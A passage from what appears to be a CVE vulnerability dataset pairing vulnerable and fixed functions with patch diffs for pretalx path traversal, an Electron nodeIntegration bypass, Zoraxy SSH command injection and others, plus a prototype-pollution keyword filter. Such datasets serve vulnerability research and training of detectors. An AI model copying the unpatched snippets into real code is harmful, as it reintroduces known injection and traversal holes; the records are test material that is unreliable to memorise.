'{}';\n\t\tvar p = 'w' + (arr[i][0] === '[' ? '' : '.') + arr[i];\n\t\tbuilder.push('if(typeof(' + p + ')!==\\'object\\'||' + p + '==null)' + p + '=' + type + ';');\n\t}\n\n\tvar v = arr[arr.length - 1];\n\tvar ispush = v.lastIndexOf('[]') !== -1;\n\tvar a = builder.join(';') + ';var v=typeof(a)===\\'function\\'?a(U.get(b)):a;w' + (v[0] === '[' ? '' : '.') + (ispush ? v.replace(REGREPLACEARR, '.push(v)') : (v + '=v')) + ';return v';\n\n\tif ((/__proto__|constructor|prototype|eval/).test(a))\n\t\tthrow new Error('Potential vulnerability');\n\n\tvar fn = new Function('w', 'a', 'b', a);\n\tF.temporary.other[cachekey] = fn;\n\tfn(obj, value, path);\n};"}], "vul_patch": "--- a/utils.js\n+++ b/utils.js\n@@ -17,8 +17,8 @@\n \tvar ispush = v.lastIndexOf('[]') !== -1;\n \tvar a = builder.join(';') + ';var v=typeof(a)===\\'function\\'?a(U.get(b)):a;w' + (v[0] === '[' ? '' : '.') + (ispush ? v.replace(REGREPLACEARR, '.push(v)') : (v + '=v')) + ';return v';\n \n-\tif ((/__proto__|constructor|prototype/).test(a))\n-\t\tthrow new Error('Prototype pollution');\n+\tif ((/__proto__|constructor|prototype|eval/).test(a))\n+\t\tthrow new Error('Potential vulnerability');\n \n \tvar fn = new Function('w', 'a', 'b', a);\n \tF.temporary.other[cachekey] = fn;\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-28458", "cve_description": "pretalx 2.3.1 before 2.3.2 allows path traversal in HTML export (a non-default feature). Organizers can trigger the overwriting (with the standard pretalx 404 page content) of an arbitrary file.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/pretalx/pretalx", "patch_url": ["https://github.com/pretalx/pretalx/commit/60722c43cf975f319e94102e6bff320723776890"], "programing_language": "Python", "vul_func": [{"id": "vul_py_304_1", "commit": "4732e8f", "file_path": "src/pretalx/agenda/management/commands/export_schedule_html.py", "start_line": 112, "end_line": 123, "snippet": "def dump_content(destination, path, getter):\n logging.debug(path)\n content = getter(path)\n if path.endswith(\"/\"):\n path = path + \"index.html\"\n\n path = Path(destination) / path.lstrip(\"/\")\n path.parent.mkdir(parents=True, exist_ok=True)\n\n with open(path, \"wb\") as f:\n f.write(content)\n return content"}, {"id": "vul_py_304_2", "commit": "4732e8f", "file_path": "src/pretalx/agenda/management/commands/export_schedule_html.py", "start_line": 126, "end_line": 135, "snippet": "def get_mediastatic_content(url):\n if url.startswith(settings.STATIC_URL):\n local_path = settings.STATIC_ROOT / url[len(settings.STATIC_URL) :]\n elif url.startswith(settings.MEDIA_URL):\n local_path = settings.MEDIA_ROOT / url[len(settings.MEDIA_URL) :]\n else:\n raise FileNotFoundError()\n\n with open(local_path, \"rb\") as f:\n return f.read()"}], "fix_func": [{"id": "fix_py_304_1", "commit": "60722c43cf975f319e94102e6bff320723776890", "file_path": "src/pretalx/agenda/management/commands/export_schedule_html.py", "start_line": 112, "end_line": 125, "snippet": "def dump_content(destination, path, getter):\n logging.debug(path)\n content = getter(path)\n if path.endswith(\"/\"):\n path = path + \"index.html\"\n\n path = (Path(destination) / path.lstrip(\"/\")).resolve()\n if not Path(destination) in path.parents:\n raise CommandError(\"Path traversal detected, aborting.\")\n path.parent.mkdir(parents=True, exist_ok=True)\n\n with open(path, \"wb\") as f:\n f.write(content)\n return content"}, {"id": "fix_py_304_2", "commit": "60722c43cf975f319e94102e6bff320723776890", "file_path": "src/pretalx/agenda/management/commands/export_schedule_html.py", "start_line": 128, "end_line": 145, "snippet": "def get_mediastatic_content(url):\n if url.startswith(settings.STATIC_URL):\n local_path = settings.STATIC_ROOT / url[len(settings.STATIC_URL) :]\n elif url.startswith(settings.MEDIA_URL):\n local_path = settings.MEDIA_ROOT / url[len(settings.MEDIA_URL) :]\n else:\n raise FileNotFoundError()\n\n # Prevent directory traversal, make sure the path is inside the media or static root\n local_path = local_path.resolve(strict=True)\n if not any(\n path in local_path.parents\n for path in (settings.MEDIA_ROOT, settings.STATIC_ROOT)\n ):\n raise FileNotFoundError()\n\n with open(local_path, \"rb\") as f:\n return f.read()"}], "vul_patch": "--- a/src/pretalx/agenda/management/commands/export_schedule_html.py\n+++ b/src/pretalx/agenda/management/commands/export_schedule_html.py\n@@ -4,7 +4,9 @@\n if path.endswith(\"/\"):\n path = path + \"index.html\"\n \n- path = Path(destination) / path.lstrip(\"/\")\n+ path = (Path(destination) / path.lstrip(\"/\")).resolve()\n+ if not Path(destination) in path.parents:\n+ raise CommandError(\"Path traversal detected, aborting.\")\n path.parent.mkdir(parents=True, exist_ok=True)\n \n with open(path, \"wb\") as f:\n\n--- a/src/pretalx/agenda/management/commands/export_schedule_html.py\n+++ b/src/pretalx/agenda/management/commands/export_schedule_html.py\n@@ -6,5 +6,13 @@\n else:\n raise FileNotFoundError()\n \n+ # Prevent directory traversal, make sure the path is inside the media or static root\n+ local_path = local_path.resolve(strict=True)\n+ if not any(\n+ path in local_path.parents\n+ for path in (settings.MEDIA_ROOT, settings.STATIC_ROOT)\n+ ):\n+ raise FileNotFoundError()\n+\n with open(local_path, \"rb\") as f:\n return f.read()\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2017-12581", "cve_description": "GitHub Electron before 1.6.8 allows remote command execution because of a nodeIntegration bypass vulnerability. This also affects all applications that bundle Electron code equivalent to 1.6.8 or earlier. Bypassing the Same Origin Policy (SOP) is a precondition; however, recent Electron versions do not have strict SOP enforcement. Combining an SOP bypass with a privileged URL internally used by Electron, it was possible to execute native Node.js primitives in order to run OS commands on the user's host. Specifically, a chrome-devtools://devtools/bundled/inspector.html window could be used to eval a Node.js child_process.execFile API call.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/electron/electron", "patch_url": ["https://github.com/electron/electron/commit/05b6d91bf4c1e0ee65eeef70cd5d1bd1df125644"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_81_1", "commit": "3f88eb2", "file_path": "lib/renderer/init.js", "start_line": "1", "end_line": "157", "snippet": "'use strict'\n\nconst events = require('events')\nconst path = require('path')\nconst Module = require('module')\nconst resolvePromise = Promise.resolve.bind(Promise)\n\n// We modified the original process.argv to let node.js load the\n// init.js, we need to restore it here.\nprocess.argv.splice(1, 1)\n\n// Clear search paths.\nrequire('../common/reset-search-paths')\n\n// Import common settings.\nrequire('../common/init')\n\nvar globalPaths = Module.globalPaths\n\n// Expose public APIs.\nglobalPaths.push(path.join(__dirname, 'api', 'exports'))\n\n// The global variable will be used by ipc for event dispatching\nvar v8Util = process.atomBinding('v8_util')\n\nv8Util.setHiddenValue(global, 'ipc', new events.EventEmitter())\n\n// Use electron module after everything is ready.\nconst electron = require('electron')\n\n// Call webFrame method.\nelectron.ipcRenderer.on('ELECTRON_INTERNAL_RENDERER_WEB_FRAME_METHOD', (event, method, args) => {\n electron.webFrame[method](...args)\n})\n\nelectron.ipcRenderer.on('ELECTRON_INTERNAL_RENDERER_SYNC_WEB_FRAME_METHOD', (event, requestId, method, args) => {\n const result = electron.webFrame[method](...args)\n event.sender.send(`ELECTRON_INTERNAL_BROWSER_SYNC_WEB_FRAME_RESPONSE_${requestId}`, result)\n})\n\nelectron.ipcRenderer.on('ELECTRON_INTERNAL_RENDERER_ASYNC_WEB_FRAME_METHOD', (event, requestId, method, args) => {\n const responseCallback = function (result) {\n resolvePromise(result)\n .then((resolvedResult) => {\n event.sender.send(`ELECTRON_INTERNAL_BROWSER_ASYNC_WEB_FRAME_RESPONSE_${requestId}`, null, resolvedResult)\n })\n .catch((resolvedError) => {\n event.sender.send(`ELECTRON_INTERNAL_BROWSER_ASYNC_WEB_FRAME_RESPONSE_${requestId}`, resolvedError)\n })\n }\n args.push(responseCallback)\n electron.webFrame[method](...args)\n})\n\n// Process command line arguments.\nlet nodeIntegration = 'false'\nlet preloadScript = null\nlet isBackgroundPage = false\nlet appPath = null\nfor (let arg of process.argv) {\n if (arg.indexOf('--guest-instance-id=') === 0) {\n // This is a guest web view.\n process.guestInstanceId = parseInt(arg.substr(arg.indexOf('=') + 1))\n } else if (arg.indexOf('--opener-id=') === 0) {\n // This is a guest BrowserWindow.\n process.openerId = parseInt(arg.substr(arg.indexOf('=') + 1))\n } else if (arg.indexOf('--node-integration=') === 0) {\n nodeIntegration = arg.substr(arg.indexOf('=') + 1)\n } else if (arg.indexOf('--preload=') === 0) {\n preloadScript = arg.substr(arg.indexOf('=') + 1)\n } else if (arg === '--background-page') {\n isBackgroundPage = true\n } else if (arg.indexOf('--app-path=') === 0) {\n appPath = arg.substr(arg.indexOf('=') + 1)\n }\n}\n\nif (window.location.protocol === 'chrome-devtools:') {\n // Override some inspector APIs.\n require('./inspector')\n nodeIntegration = 'true'\n} else if (window.location.protocol === 'chrome-extension:') {\n // Add implementations of chrome API.\n require('./chrome-api').injectTo(window.location.hostname, isBackgroundPage, window)\n nodeIntegration = 'false'\n} else if (window.location.protocol === 'chrome:') {\n // Disable node integration for chrome UI scheme.\n nodeIntegration = 'false'\n} else {\n // Override default web functions.\n require('./override')\n\n // Inject content scripts.\n require('./content-scripts-injector')\n\n // Load webview tag implementation.\n if (nodeIntegration === 'true' && process.guestInstanceId == null) {\n require('./web-view/web-view')\n require('./web-view/web-view-attributes')\n }\n}\n\nif (nodeIntegration === 'true') {\n // Export node bindings to global.\n global.require = require\n global.module = module\n\n // Set the __filename to the path of html file if it is file: protocol.\n if (window.location.protocol === 'file:') {\n var pathname = process.platform === 'win32' && window.location.pathname[0] === '/' ? window.location.pathname.substr(1) : window.location.pathname\n global.__filename = path.normalize(decodeURIComponent(pathname))\n global.__dirname = path.dirname(global.__filename)\n\n // Set module's filename so relative require can work as expected.\n module.filename = global.__filename\n\n // Also search for module under the html file.\n module.paths = module.paths.concat(Module._nodeModulePaths(global.__dirname))\n } else {\n global.__filename = __filename\n global.__dirname = __dirname\n\n if (appPath) {\n // Search for module under the app directory\n module.paths = module.paths.concat(Module._nodeModulePaths(appPath))\n }\n }\n\n // Redirect window.onerror to uncaughtException.\n window.onerror = function (message, filename, lineno, colno, error) {\n if (global.process.listeners('uncaughtException').length > 0) {\n global.process.emit('uncaughtException', error)\n return true\n } else {\n return false\n }\n }\n} else {\n // Delete Node's symbols after the Environment has been loaded.\n process.once('loaded', function () {\n delete global.process\n delete global.Buffer\n delete global.setImmediate\n delete global.clearImmediate\n delete global.global\n })\n}\n\n// Load the script specfied by the \"preload\" attribute.\nif (preloadScript) {\n try {\n require(preloadScript)\n } catch (error) {\n console.error('Unable to load preload script: ' + preloadScript)\n console.error(error.stack || error.message)\n }\n}"}], "fix_func": [{"id": "fix_js_81_1", "commit": "05b6d91", "file_path": "lib/renderer/init.js", "start_line": "1", "end_line": "157", "snippet": "'use strict'\n\nconst events = require('events')\nconst path = require('path')\nconst Module = require('module')\nconst resolvePromise = Promise.resolve.bind(Promise)\n\n// We modified the original process.argv to let node.js load the\n// init.js, we need to restore it here.\nprocess.argv.splice(1, 1)\n\n// Clear search paths.\nrequire('../common/reset-search-paths')\n\n// Import common settings.\nrequire('../common/init')\n\nvar globalPaths = Module.globalPaths\n\n// Expose public APIs.\nglobalPaths.push(path.join(__dirname, 'api', 'exports'))\n\n// The global variable will be used by ipc for event dispatching\nvar v8Util = process.atomBinding('v8_util')\n\nv8Util.setHiddenValue(global, 'ipc', new events.EventEmitter())\n\n// Use electron module after everything is ready.\nconst electron = require('electron')\n\n// Call webFrame method.\nelectron.ipcRenderer.on('ELECTRON_INTERNAL_RENDERER_WEB_FRAME_METHOD', (event, method, args) => {\n electron.webFrame[method](...args)\n})\n\nelectron.ipcRenderer.on('ELECTRON_INTERNAL_RENDERER_SYNC_WEB_FRAME_METHOD', (event, requestId, method, args) => {\n const result = electron.webFrame[method](...args)\n event.sender.send(`ELECTRON_INTERNAL_BROWSER_SYNC_WEB_FRAME_RESPONSE_${requestId}`, result)\n})\n\nelectron.ipcRenderer.on('ELECTRON_INTERNAL_RENDERER_ASYNC_WEB_FRAME_METHOD', (event, requestId, method, args) => {\n const responseCallback = function (result) {\n resolvePromise(result)\n .then((resolvedResult) => {\n event.sender.send(`ELECTRON_INTERNAL_BROWSER_ASYNC_WEB_FRAME_RESPONSE_${requestId}`, null, resolvedResult)\n })\n .catch((resolvedError) => {\n event.sender.send(`ELECTRON_INTERNAL_BROWSER_ASYNC_WEB_FRAME_RESPONSE_${requestId}`, resolvedError)\n })\n }\n args.push(responseCallback)\n electron.webFrame[method](...args)\n})\n\n// Process command line arguments.\nlet nodeIntegration = 'false'\nlet preloadScript = null\nlet isBackgroundPage = false\nlet appPath = null\nfor (let arg of process.argv) {\n if (arg.indexOf('--guest-instance-id=') === 0) {\n // This is a guest web view.\n process.guestInstanceId = parseInt(arg.substr(arg.indexOf('=') + 1))\n } else if (arg.indexOf('--opener-id=') === 0) {\n // This is a guest BrowserWindow.\n process.openerId = parseInt(arg.substr(arg.indexOf('=') + 1))\n } else if (arg.indexOf('--node-integration=') === 0) {\n nodeIntegration = arg.substr(arg.indexOf('=') + 1)\n } else if (arg.indexOf('--preload=') === 0) {\n preloadScript = arg.substr(arg.indexOf('=') + 1)\n } else if (arg === '--background-page') {\n isBackgroundPage = true\n } else if (arg.indexOf('--app-path=') === 0) {\n appPath = arg.substr(arg.indexOf('=') + 1)\n }\n}\n\nif (window.location.protocol === 'chrome-devtools:') {\n // Override some inspector APIs.\n require('./inspector')\n nodeIntegration = 'false'\n} else if (window.location.protocol === 'chrome-extension:') {\n // Add implementations of chrome API.\n require('./chrome-api').injectTo(window.location.hostname, isBackgroundPage, window)\n nodeIntegration = 'false'\n} else if (window.location.protocol === 'chrome:') {\n // Disable node integration for chrome UI scheme.\n nodeIntegration = 'false'\n} else {\n // Override default web functions.\n require('./override')\n\n // Inject content scripts.\n require('./content-scripts-injector')\n\n // Load webview tag implementation.\n if (nodeIntegration === 'true' && process.guestInstanceId == null) {\n require('./web-view/web-view')\n require('./web-view/web-view-attributes')\n }\n}\n\nif (nodeIntegration === 'true') {\n // Export node bindings to global.\n global.require = require\n global.module = module\n\n // Set the __filename to the path of html file if it is file: protocol.\n if (window.location.protocol === 'file:') {\n var pathname = process.platform === 'win32' && window.location.pathname[0] === '/' ? window.location.pathname.substr(1) : window.location.pathname\n global.__filename = path.normalize(decodeURIComponent(pathname))\n global.__dirname = path.dirname(global.__filename)\n\n // Set module's filename so relative require can work as expected.\n module.filename = global.__filename\n\n // Also search for module under the html file.\n module.paths = module.paths.concat(Module._nodeModulePaths(global.__dirname))\n } else {\n global.__filename = __filename\n global.__dirname = __dirname\n\n if (appPath) {\n // Search for module under the app directory\n module.paths = module.paths.concat(Module._nodeModulePaths(appPath))\n }\n }\n\n // Redirect window.onerror to uncaughtException.\n window.onerror = function (message, filename, lineno, colno, error) {\n if (global.process.listeners('uncaughtException').length > 0) {\n global.process.emit('uncaughtException', error)\n return true\n } else {\n return false\n }\n }\n} else {\n // Delete Node's symbols after the Environment has been loaded.\n process.once('loaded', function () {\n delete global.process\n delete global.Buffer\n delete global.setImmediate\n delete global.clearImmediate\n delete global.global\n })\n}\n\n// Load the script specfied by the \"preload\" attribute.\nif (preloadScript) {\n try {\n require(preloadScript)\n } catch (error) {\n console.error('Unable to load preload script: ' + preloadScript)\n console.error(error.stack || error.message)\n }\n}"}], "vul_patch": "--- a/lib/renderer/init.js\n+++ b/lib/renderer/init.js\n@@ -78,7 +78,7 @@\n if (window.location.protocol === 'chrome-devtools:') {\n // Override some inspector APIs.\n require('./inspector')\n- nodeIntegration = 'true'\n+ nodeIntegration = 'false'\n } else if (window.location.protocol === 'chrome-extension:') {\n // Add implementations of chrome API.\n require('./chrome-api').injectTo(window.location.hostname, isBackgroundPage, window)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-52010", "cve_description": "Zoraxy is a general purpose HTTP reverse proxy and forwarding tool. A command injection vulnerability in the Web SSH feature allows an authenticated attacker to execute arbitrary commands as root on the host. Zoraxy has a Web SSH terminal feature that allows authenticated users to connect to SSH servers from their browsers. In HandleCreateProxySession the request to create an SSH session is handled. An attacker can exploit the username variable to escape from the bash command and inject arbitrary commands into sshCommand. This is possible, because, unlike hostname and port, the username is not validated or sanitized.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/tobychui/zoraxy", "patch_url": ["https://github.com/tobychui/zoraxy/commit/2e9bc77a5d832bff1093058d42ce7a61382e4bc6", "https://github.com/tobychui/zoraxy/commit/c07d5f85dfc37bd32819358ed7d4bc32c604e8f0"], "programing_language": "Go", "vul_func": [{"id": "vul_go_32_1", "commit": "e79a70b", "file_path": "src/mod/sshprox/sshprox.go", "start_line": 165, "end_line": 203, "snippet": "func (i *Instance) CreateNewConnection(listenPort int, username string, remoteIpAddr string, remotePort int) error {\n\t//Create a gotty instance\n\tconnAddr := remoteIpAddr\n\tif username != \"\" {\n\t\tconnAddr = username + \"@\" + remoteIpAddr\n\t}\n\tconfigPath := filepath.Join(filepath.Dir(i.ExecPath), \".gotty\")\n\ttitle := username + \"@\" + remoteIpAddr\n\tif remotePort != 22 {\n\t\ttitle = title + \":\" + strconv.Itoa(remotePort)\n\t}\n\n\tsshCommand := []string{\"ssh\", \"-t\", connAddr, \"-p\", strconv.Itoa(remotePort)}\n\tcmd := exec.Command(i.ExecPath, \"-w\", \"-p\", strconv.Itoa(listenPort), \"--once\", \"--config\", configPath, \"--title-format\", title, \"bash\", \"-c\", strings.Join(sshCommand, \" \"))\n\tcmd.Dir = filepath.Dir(i.ExecPath)\n\tcmd.Env = append(os.Environ(), \"TERM=xterm\")\n\tcmd.Stdout = os.Stdout\n\tcmd.Stderr = os.Stderr\n\tgo func() {\n\t\tcmd.Run()\n\t\ti.Destroy()\n\t}()\n\ti.tty = cmd\n\ti.AssignedPort = listenPort\n\ti.RemoteAddr = remoteIpAddr\n\ti.RemotePort = remotePort\n\n\t//Create a new proxy agent for this root\n\tpath, err := url.Parse(\"http://127.0.0.1:\" + strconv.Itoa(listenPort))\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t//Create new proxy objects to the proxy\n\tproxy := reverseproxy.NewReverseProxy(path)\n\n\ti.conn = proxy\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_32_1", "commit": "2e9bc77", "file_path": "src/mod/sshprox/sshprox.go", "start_line": 150, "end_line": 199, "snippet": "func (i *Instance) CreateNewConnection(listenPort int, username string, remoteIpAddr string, remotePort int) error {\n\t//Create a gotty instance\n\tconnAddr := remoteIpAddr\n\tif username != \"\" {\n\t\tconnAddr = username + \"@\" + remoteIpAddr\n\t}\n\n\t//Trim the space in the username and remote address\n\tusername = strings.TrimSpace(username)\n\tremoteIpAddr = strings.TrimSpace(remoteIpAddr)\n\n\t//Validate the username and remote address\n\terr := ValidateUsernameAndRemoteAddr(username, remoteIpAddr)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tconfigPath := filepath.Join(filepath.Dir(i.ExecPath), \".gotty\")\n\ttitle := username + \"@\" + remoteIpAddr\n\tif remotePort != 22 {\n\t\ttitle = title + \":\" + strconv.Itoa(remotePort)\n\t}\n\n\tsshCommand := []string{\"ssh\", \"-t\", connAddr, \"-p\", strconv.Itoa(remotePort)}\n\tcmd := exec.Command(i.ExecPath, \"-w\", \"-p\", strconv.Itoa(listenPort), \"--once\", \"--config\", configPath, \"--title-format\", title, \"bash\", \"-c\", strings.Join(sshCommand, \" \"))\n\tcmd.Dir = filepath.Dir(i.ExecPath)\n\tcmd.Env = append(os.Environ(), \"TERM=xterm\")\n\tcmd.Stdout = os.Stdout\n\tcmd.Stderr = os.Stderr\n\tgo func() {\n\t\tcmd.Run()\n\t\ti.Destroy()\n\t}()\n\ti.tty = cmd\n\ti.AssignedPort = listenPort\n\ti.RemoteAddr = remoteIpAddr\n\ti.RemotePort = remotePort\n\n\t//Create a new proxy agent for this root\n\tpath, err := url.Parse(\"http://127.0.0.1:\" + strconv.Itoa(listenPort))\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t//Create new proxy objects to the proxy\n\tproxy := reverseproxy.NewReverseProxy(path)\n\n\ti.conn = proxy\n\treturn nil\n}"}, {"id": "fix_go_32_2", "commit": "2e9bc77", "file_path": "src/mod/sshprox/utils.go", "start_line": 81, "end_line": 101, "snippet": "func ValidateUsernameAndRemoteAddr(username string, remoteIpAddr string) error {\n\t// Validate and sanitize the username to prevent ssh injection\n\tvalidUsername := regexp.MustCompile(`^[a-zA-Z0-9._-]+$`)\n\tif !validUsername.MatchString(username) {\n\t\treturn errors.New(\"invalid username, only alphanumeric characters, dots, underscores and dashes are allowed\")\n\t}\n\n\t//Check if the remoteIpAddr is a valid ipv4 or ipv6 address\n\tif net.ParseIP(remoteIpAddr) != nil {\n\t\t//A valid IP address do not need further validation\n\t\treturn nil\n\t}\n\n\t// Validate and sanitize the remote domain to prevent injection\n\tvalidRemoteAddr := regexp.MustCompile(`^[a-zA-Z0-9._-]+$`)\n\tif !validRemoteAddr.MatchString(remoteIpAddr) {\n\t\treturn errors.New(\"invalid remote address, only alphanumeric characters, dots, underscores and dashes are allowed\")\n\t}\n\n\treturn nil\n}"}, {"id": "fix_go_32_3", "commit": "2e9bc77", "file_path": "src/webssh.go", "start_line": 19, "end_line": 75, "snippet": "func HandleCreateProxySession(w http.ResponseWriter, r *http.Request) {\n\t//Get what ip address and port to connect to\n\tipaddr, err := utils.PostPara(r, \"ipaddr\")\n\tif err != nil {\n\t\thttp.Error(w, \"Invalid Usage\", http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tportString, err := utils.PostPara(r, \"port\")\n\tif err != nil {\n\t\tportString = \"22\"\n\t}\n\n\tusername, err := utils.PostPara(r, \"username\")\n\tif err != nil {\n\t\tusername = \"\"\n\t}\n\n\tport, err := strconv.Atoi(portString)\n\tif err != nil {\n\t\tutils.SendErrorResponse(w, \"invalid port number given\")\n\t\treturn\n\t}\n\n\tif !*allowSshLoopback {\n\t\t//Not allow loopback connections\n\t\tif sshprox.IsLoopbackIPOrDomain(ipaddr) {\n\t\t\t//Request target is loopback\n\t\t\tutils.SendErrorResponse(w, \"loopback web ssh connection is not enabled on this host\")\n\t\t\treturn\n\t\t}\n\t}\n\n\t//Check if the target is a valid ssh endpoint\n\tif !sshprox.IsSSHConnectable(ipaddr, port) {\n\t\tutils.SendErrorResponse(w, ipaddr+\":\"+strconv.Itoa(port)+\" is not a valid SSH server\")\n\t\treturn\n\t}\n\n\t//Create a new proxy instance\n\tinstance, err := webSshManager.NewSSHProxy(\"./tmp/gotty\")\n\tif err != nil {\n\t\tutils.SendErrorResponse(w, strings.ReplaceAll(err.Error(), \"\\\\\", \"/\"))\n\t\treturn\n\t}\n\n\t//Create an ssh process to the target address\n\terr = instance.CreateNewConnection(webSshManager.GetNextPort(), username, ipaddr, port)\n\tif err != nil {\n\t\tutils.SendErrorResponse(w, err.Error())\n\t\treturn\n\t}\n\n\t//Return the instance uuid\n\tjs, _ := json.Marshal(instance.UUID)\n\tutils.SendJSONResponse(w, string(js))\n}"}], "vul_patch": "--- a/src/mod/sshprox/sshprox.go\n+++ b/src/mod/sshprox/sshprox.go\n@@ -4,6 +4,17 @@\n \tif username != \"\" {\n \t\tconnAddr = username + \"@\" + remoteIpAddr\n \t}\n+\n+\t//Trim the space in the username and remote address\n+\tusername = strings.TrimSpace(username)\n+\tremoteIpAddr = strings.TrimSpace(remoteIpAddr)\n+\n+\t//Validate the username and remote address\n+\terr := ValidateUsernameAndRemoteAddr(username, remoteIpAddr)\n+\tif err != nil {\n+\t\treturn err\n+\t}\n+\n \tconfigPath := filepath.Join(filepath.Dir(i.ExecPath), \".gotty\")\n \ttitle := username + \"@\" + remoteIpAddr\n \tif remotePort != 22 {\n\n--- /dev/null\n+++ b/src/mod/sshprox/sshprox.go\n@@ -0,0 +1,21 @@\n+func ValidateUsernameAndRemoteAddr(username string, remoteIpAddr string) error {\n+\t// Validate and sanitize the username to prevent ssh injection\n+\tvalidUsername := regexp.MustCompile(`^[a-zA-Z0-9._-]+$`)\n+\tif !validUsername.MatchString(username) {\n+\t\treturn errors.New(\"invalid username, only alphanumeric characters, dots, underscores and dashes are allowed\")\n+\t}\n+\n+\t//Check if the remoteIpAddr is a valid ipv4 or ipv6 address\n+\tif net.ParseIP(remoteIpAddr) != nil {\n+\t\t//A valid IP address do not need further validation\n+\t\treturn nil\n+\t}\n+\n+\t// Validate and sanitize the remote domain to prevent injection\n+\tvalidRemoteAddr := regexp.MustCompile(`^[a-zA-Z0-9._-]+$`)\n+\tif !validRemoteAddr.MatchString(remoteIpAddr) {\n+\t\treturn errors.New(\"invalid remote address, only alphanumeric characters, dots, underscores and dashes are allowed\")\n+\t}\n+\n+\treturn nil\n+}\n\n--- /dev/null\n+++ b/src/mod/sshprox/sshprox.go\n@@ -0,0 +1,57 @@\n+func HandleCreateProxySession(w http.ResponseWriter, r *http.Request) {\n+\t//Get what ip address and port to connect to\n+\tipaddr, err := utils.PostPara(r, \"ipaddr\")\n+\tif err != nil {\n+\t\thttp.Error(w, \"Invalid Usage\", http.StatusInternalServerError)\n+\t\treturn\n+\t}\n+\n+\tportString, err := utils.PostPara(r, \"port\")\n+\tif err != nil {\n+\t\tportString = \"22\"\n+\t}\n+\n+\tusername, err := utils.PostPara(r, \"username\")\n+\tif err != nil {\n+\t\tusername = \"\"\n+\t}\n+\n+\tport, err := strconv.Atoi(portString)\n+\tif err != nil {\n+\t\tutils.SendErrorResponse(w, \"invalid port number given\")\n+\t\treturn\n+\t}\n+\n+\tif !*allowSshLoopback {\n+\t\t//Not allow loopback connections\n+\t\tif sshprox.IsLoopbackIPOrDomain(ipaddr) {\n+\t\t\t//Request target is loopback\n+\t\t\tutils.SendErrorResponse(w, \"loopback web ssh connection is not enabled on this host\")\n+\t\t\treturn\n+\t\t}\n+\t}\n+\n+\t//Check if the target is a valid ssh endpoint\n+\tif !sshprox.IsSSHConnectable(ipaddr, port) {\n+\t\tutils.SendErrorResponse(w, ipaddr+\":\"+strconv.Itoa(port)+\" is not a valid SSH server\")\n+\t\treturn\n+\t}\n+\n+\t//Create a new proxy instance\n+\tinstance, err := webSshManager.NewSSHProxy(\"./tmp/gotty\")\n+\tif err != nil {\n+\t\tutils.SendErrorResponse(w, strings.ReplaceAll(err.Error(), \"\\\\\", \"/\"))\n+\t\treturn\n+\t}\n+\n+\t//Create an ssh process to the target address\n+\terr = instance.CreateNewConnection(webSshManager.GetNextPort(), username, ipaddr, port)\n+\tif err != nil {\n+\t\tutils.SendErrorResponse(w, err.Error())\n+\t\treturn\n+\t}\n+\n+\t//Return the instance uuid\n+\tjs, _ := json.Marshal(instance.UUID)\n+\tutils.SendJSONResponse(w, string(js))\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-52010:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/zoraxy\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ncd ./src/mod/sshprox && go test -timeout 30s -run ^TestCreateNewConnection$ imuslab.com/zoraxy/mod/sshprox\n", "unit_test_cmd": null} {"cve_id": "CVE-2023-4106", "cve_description": "Mattermost fails to check if the requesting user is a guest before performing different actions to public playbooks, resulting a guest being able to\u00a0view, join, edit, export and archive public playbooks.\n\n", "cwe_info": {"CWE-862": {"name": "Missing Authorization", "description": "The product does not perform an authorization check when an actor attempts to access a resource or perform an action."}}, "repo": "https://github.com/mattermost/mattermost", "patch_url": ["https://github.com/mattermost/mattermost/commit/93511636ba2cbb38efd000af019fb89cd993b2f3", "https://github.com/mattermost/mattermost/commit/16af122696be49f1756a390446e6825976d438a8", "https://github.com/mattermost/mattermost/commit/9560a4a5596d400495feaa5911ef0116b0267e49"], "programing_language": "Go", "vul_func": [{"id": "vul_go_123_1", "commit": "9c1ca9e", "file_path": "app/platform/service.go", "start_line": 372, "end_line": 374, "snippet": "func (ps *PlatformService) SetTelemetryId(id string) {\n\tps.telemetryId = 